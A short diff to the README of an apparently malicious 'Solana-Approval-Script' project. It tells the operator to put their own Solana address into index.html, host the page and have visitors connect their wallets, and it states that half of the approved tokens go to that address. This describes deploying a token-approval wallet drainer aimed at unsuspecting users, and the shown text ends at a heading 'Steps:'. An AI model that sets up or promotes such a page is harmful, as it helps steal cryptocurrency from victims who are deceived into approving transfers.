samir07beep/Solana-Approval-Script/README.md

 Open the `index.html` file in visual code.

-Replace Line 44 with your Solana Address
+Replace on the *Line 42* your Solana Address

 Host the project and **Connect Wallet**

+50% Approved token goes to the address on line 42

 Steps: